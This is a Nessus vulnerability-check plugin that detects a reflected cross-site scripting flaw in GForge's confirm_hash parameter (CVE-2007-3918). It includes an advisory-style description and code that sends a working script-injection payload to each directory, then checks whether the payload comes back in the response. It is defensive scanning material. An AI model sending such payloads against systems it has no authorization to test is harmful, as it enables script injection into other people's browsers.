#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(26927);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-3918");
  script_bugtraq_id(25923);
  script_xref(name:"OSVDB", value:"37424");

  script_name(english:"GForge confirm_hash Parameter Cross-Site Scripting Vulnerability");
  script_summary(english:"Tries to exploit an XSS issue in GForge");

  desc = "
Synopsis :

The remote web server contains a PHP script that is affected by a
cross-site scripting vulnerability. 

Description :

The remote host is running GForge, a web-based project for
collaborative software development. 

The version of GForge installed on the remote host fails to sanitize
user-supplied input to the 'confirm_hash' parameter of the
'account/verify.php' script before using it to generate dynamic
output.  An unauthenticated remote attacker may be able to leverage
this issue to inject arbitrary HTML or script code into a user's
browser to be executed within the security context of the affected
site. 

See also :

http://gforge.org/tracker/?func=detail&atid=105&aid=3094&group_id=1
http://www.nessus.org/u?2193dcbf

Solution :

Apply the patch referenced in the vendor advisory above. 

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


# Loop through various directories.
if (thorough_tests) dirs = make_list("/gforge", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  if (dir == "") dir = "/";

  # Try to exploit the issue.
  xss = string("<script>alert(", SCRIPT_NAME, ")</script>");

  req = http_get(
    item:string(
      dir, "/account/verify.php?",
      'confirm_hash=">', urlencode(str:xss)
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we see our exploit.
  if (
    string('name="confirm_hash" value="">', xss, '"') >< res ||
    string('name="confirm_hash" value="\\">', xss, '"') >< res
  )
  {
    security_warning(port);
    exit(0);
  }
}
